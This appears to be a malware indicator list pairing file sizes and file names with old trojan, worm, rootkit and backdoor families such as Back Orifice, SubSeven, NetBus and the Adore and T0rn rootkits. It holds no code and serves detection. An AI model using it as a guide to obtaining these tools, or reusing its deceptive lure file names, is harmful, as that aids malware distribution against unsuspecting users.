678 About.com Gnotify
686 Ipxkcr.com KCR
686 Wprinter spitter.com Printer Spitter
688 Playkcr.com KCR
689 BlackDay.bat BlackDay
696 Bo2k-defs.h.in Back Orifice Communications Library
703 Chkperm.txt Solaris rootkit
710 Evilhtml_2.zip Evil HTML Format
721 S7config.cfg SubSeven 2.2
722 Mkinstalldirs Back Orifice Communications Library
726 Int09mon.com 9x Int 09 Moniter
730 DestroyerNT.zip God
763 Config.h.in Back Orifice Communications Library
764 Mdlstartup.bas Autoftp1
765 Incremental ADM worm
766 Element.ico Elem
768 Systrayicon.exe SubSeven
772 Libbo2k.dsw Back Orifice Communications Library
773 Qtaz20pl.diz Q-taz
774 Makefile.gen Adore rootkit
776 Prosiak.ini Prosiak
779 En-cid12.dat The 1-900 Trojan
781 Qtaz22.diz Q-taz
781 Qtaz23.diz Q-taz
797 Urls.ini neXus
801 Clientootlt.vbp EH trojan
807 All-root.zip allroot
809 Netbus.cnt NetBus 2.0 Pro
812 Backage32se.bagage Backage
823 Rat10.zip Remote Administration Tool - RAT
824 Xtratank.com Xtratank
825 Remotecntrl.mrc neXus
839 Nor.wps Alcarys.G
843 Christina_aguilera_nude!.vbs Reaper
844 Libbo2kspec Back Orifice Communications Library
844 Freejc.exe Free JC suite
846 Freejc2.exe Free JC suite
847 Libbo2k.spec.in Back Orifice Communications Library
852 Serverootlt.vbp EH trojan
868 Crack4jc.exe Free JC suite
872 Outlookjs.class GodWill
879 Backage3.ini Backage
887 Extract.dsg Oblivion Dropper Source Generator
888 Natas.url Natas
899 Aboutblank.htm Blank
915 Config.h Back Orifice Communications Library
926 V.com LFM-926
928 Email.vbs BuggyWorm
930 Audpserver A UDP backdoor
942 Malkavian.url Lucky2
958 Icqcrack.zip Apulia
964 Audpbackdoor.tar.gz A UDP backdoor
964 Geax105.com GetIt Keylogger
965 Strhandle.h Back Orifice Communications Library
967 Coldir.com Coldir trojan
967 Read-me.pif Golden Retriever
987 Th3tr41t0r.vbp The Traitor (= th3tr41t0r)
992 EX_Folder.zip EX_Folder
993 AOL4free.com AOL4FREE
996 Ghostdog.zip GhostDog
1008 Overquota.bat OverQuota
1014 All-root.c allroot
1014 Procspy.ini Cyber Sensor
1019 Getitsdw.com GetIt Keylogger
1024 Server.exe Mini Web Downloader
1028 Dailupraper.dep Dunrape
1032 Rat11.zip Remote Administration Tool - RAT
1035 Audpclient A UDP backdoor
1046 Win95.exe Free JC suite
1052 Winnt.exe Free JC suite
1055 Evilhtml2.zip Evil HTML Format
1067 Skin.ini Mos**ker
1076 Mskernel32.vbs Dayumi
1076 Gssh101.com GetIt Keylogger
1078 Icon1.ico Enigma´s Setup Trojan
1088 Alloyico.dll Alloy Executable Compiler
1088 Boy95.com SpyBoy
1094 Bad.dat Got You
1095 (version C) Pica
1100 17th.Inst.zip 17th.Inst
1122 Oggy_froggy1_2.zip Oggy Froggy
1137 Lame.cpp Lame
1148 Evil98.html Evil HTML Share
1148 Wing.ini WinGrab
1152 Screen.tpu EasyTrojan
1165 Setup.ini Alloy Executable Compiler
1169 Protools.com PECompact
1184 Miranda.zip Miranda
1187 Movie.avi.pif Homemade
1195 lbk.tar.gz lbk
1204 Winf**k.zip Winf**k
1218 Menu.cfg SubSeven 2.2
1235 Destroyernt.txt God
1243 Playkcr.zip KCR
1257 Trojan.vbp TailGunner
1281 Funtime95.hta Funtime Apocolypse
1281 Funtiment.hta Funtime Apocolypse
1285 Without.bat Without
1292 Ibug.ini neXus
1300 98sfix.bat Control trojan
1325 Ghostdog.com GhostDog
1330 Getitkeyloggsdw100r.zip GetIt Keylogger
1333 Passcrypt.zip QueBus
1339 Winf**k.bat Winf**k
1345 T0rnsb T0rn Rootkit
1357 Kcr.zip KCR
1366 EX_Folder.bat EX_Folder
1374 Giant.frm EH trojan
1382 Sz T0rn Rootkit
1383 Blitz.c BlitzNet
1408 Catman.com Catman trojan
1408 General.tpu EasyTrojan
1429 Configure.in Back Orifice Communications Library
1443 Skisetup.log Stealth Keyboard Interceptor Auto Sender
1454 Picard.vbs Lee
1455 Ffb24.c Solaris rootkit
1458 Modregistry.bas The Traitor (= th3tr41t0r)
1470 Ns.com Hackin' for Newbies
1478 Ipxkcr.zip KCR
1483 Scanconnect.c ADM worm
1489 Lion24.c Solaris rootkit
1489 Zip-troj.zip Zip trojan
1492 Commands.cfg Undetected
1511 Winsck.ini GateCrasher
1517 Teenslideshow.scr Sinep
1517 Winsystem.vbs Sinep
1531 Sam.htm Emailtips
1536 ~df127d.tmp CrazzyNet
1551 REQUESTED_INFO.DOC.vbs Req
1560 Commandloop.h Back Orifice Communications Library
1566 Cmoney.com Resizer
1578 Fservecheat.zip SubSeven scripts
1594 Evilnt.html Evil HTML Share
1594 Trojanrunnernt.txt God
1640 Lemon24.c Solaris rootkit
1668 Annhiliatent.txt God
1673 Evilhtml.zip Evil HTML Format
1690 Dtv31-lite-client.ini Deep Throat
1710 Script1.rc Enigma´s Setup Trojan
1710 Saranwrap.rc NokNok
1710 Silkrope.rc Silk Rope
1728 Uninstal.ini NetBuster Killer
1732 Ntshareme.html Evil HTML Share
1753 98shareme.html Evil HTML Share
1771 Miranda.com Miranda
1773 Multimedia.lte Multimedia, Lithium plug-in
1795 Plugins.h Back Orifice Communications Library
1807 Dccf**k.zip SubSeven scripts
1826 gH-cgi.c gH CGI Backdoor
1829 Xls.wps Alcarys.G
1836 Humanismo.html.vbs Manis
1858 Form3.frx The Traitor (= th3tr41t0r)
1877 FOTOS_YABRAN_VIVO_HOY.JPG.vbs Yabran
1917 Evil.html Evil HTML Format
1926 Runmenow.com HD trojan
1929 Trojan.frm TailGunner
1944 Frmcompleted.frm Autoftp1
1948 (B)Independance_Day.vbs Lee
1949 Utrojan.c Universal trojan
1950 Blank.html. 321 bytesDoc.wps Alcarys.G
1957 Dummy.c Adore rootkit
1971 Gravedad.zip Gravedad
2009 Deisl1.isu Trojan Hide Tool
2031 Bocomreg.h Back Orifice Communications Library
2035 Cleaner.c Adore rootkit
2037 Acid setup.zip Acid Shivers
2061 Pif worm emmapeel.zip Emma Peel
2063 English.ini Masters Paradise
2070 Cartolina.vbs Cartolina
2083 Upgradetowindowsxp.bat Jerm
2140 Notify.php Nawai
2143 Splash2.jpg GayOL
2146 Supernovae.999.zip SuperNova
2177 Autoftp1.vbp Autoftp1
2190 Hellyeah.zip Hellfirez
2192 Passwd_irix.c Password trojan
2195 Ds9.vbs Lee
2244 xmas.vbs Jean
2261 Cinstall.com Host Control
2275 Sys32.exe Cable
2278 El15_bmp.exe El15 BMP
2288 Commnet.h Back Orifice Communications Library
2296 Remote.ini neXus
2303 Stuff.mrc neXus
2310 Avkiller2.zip AVKillah
2317 Friend_message.txt.vbs FriendMess
2336 Illwill_info.exe Nawai
2336 Dod.mrc neXus
2353 Mirko.bat Krim
2355 Rush.tcl BlitzNet
2361 Beerwyrm.vbs Beerwyrm
2370 Edit_cfg.wri FTP SMTP
2383 Slist.mrc neXus
2392 Destroyer98.txt God
2407 Msinet.dep Cero
2407 Uninstal.ini Sensive
2417 Whatsnew.300 PKZip Trojan
2417 Freemp3s.vbs Resreg
2420 VBS.Lava.vbs Fiber
2422 VBS.Lava.vbs Fiber
2436 Homepage.html.vbs Homepage
2465 Mswinsck.dep Cero
2472 Frmlogin.fram Autoftp1
2494 Dropper.com Brebarka
2506 Imagehlp.dll MTX II
2519 Deutsch.ini Masters Paradise
2555 Pricol.exe Pricol
2576 Iohandler.h Back Orifice Communications Library
2592 Ocx.reg BusConquerer
2592 Ocx.reg NetBuster Killer
2592 Ocx.reg Psyber Stream Server
2601 Libinvisible.h Adore rootkit
2606 Kernel32.vbs PWStroy
2643 El15bmp.zip El15 BMP
2644 Worm_Elva.zip Elva
2649 Xremote.1 Xremote
2655 Breberka.txt .vbe Brebarka
2686 System.dll.vbs Bajar.B
2705 Vue testing service.txt.zip GhostDog
2709 Xremote.spec Xremote
2729 Psrace.c Solaris rootkit
2734 Annhiliate98.txt God
2734 Ircworm-julie.zip Julie
2758 Qfatc.zip Qfat
2784 Tsrpart.tpu EasyTrojan
2795 pp.pl Shaft
2803 kbdv2.c Linux loadable kernel module backdoor
2823 Oggy_fro.bat Oggy Froggy
2850 Encryption.h Back Orifice Communications Library
2853 Annakournikova.jpg.vbs OntheFly
2888 Nlc.mrc neXus
2918 Replace.mrc neXus
2922 Win32.cpp Back Orifice Communications Library
2922 Regclean.exe.js Olvort
2922 Regclean.exe.js Olvortex
2933 Brahma.jpg.vbs Rahma
2944 Serverootlt.frm EH trojan
2951 Cool_notepad_demo.txt.vbs CoolNote
2968 Configure Adore rootkit
2999 kbd.c Linux loadable kernel module backdoor
3008 Hosts.ip neXus
3008 Hosts.ip NokNok
3036 Nogzoeen.exe Nogzoeen
3062 Log.cgi Net-Devil CGI-logger
3072 Tloader1.exe K2 Turbo Loader
3072 Vbrun4x.dll K2 Turbo Loader
3072 Lang.exe Langex
3072 Webasylum.exe Web Asylum
3072 Server.exe WWWPW
3085 Trojanrunner98.txt God
3095 Upsddown.zip UpSideDown
3097 Folder.html Challenge
3104 Pager.exe ICQ Pager
3116 El15_bmp.zip El15 BMP
3124 17th.Inst.htm 17th.Inst
3141 Ban24.c Solaris rootkit
3178 Mawanella.vbs Mawanella
3193 Linkage.h Back Orifice Communications Library
3219 Dict.smp FTP SMTP
3232 Install.exe HD troj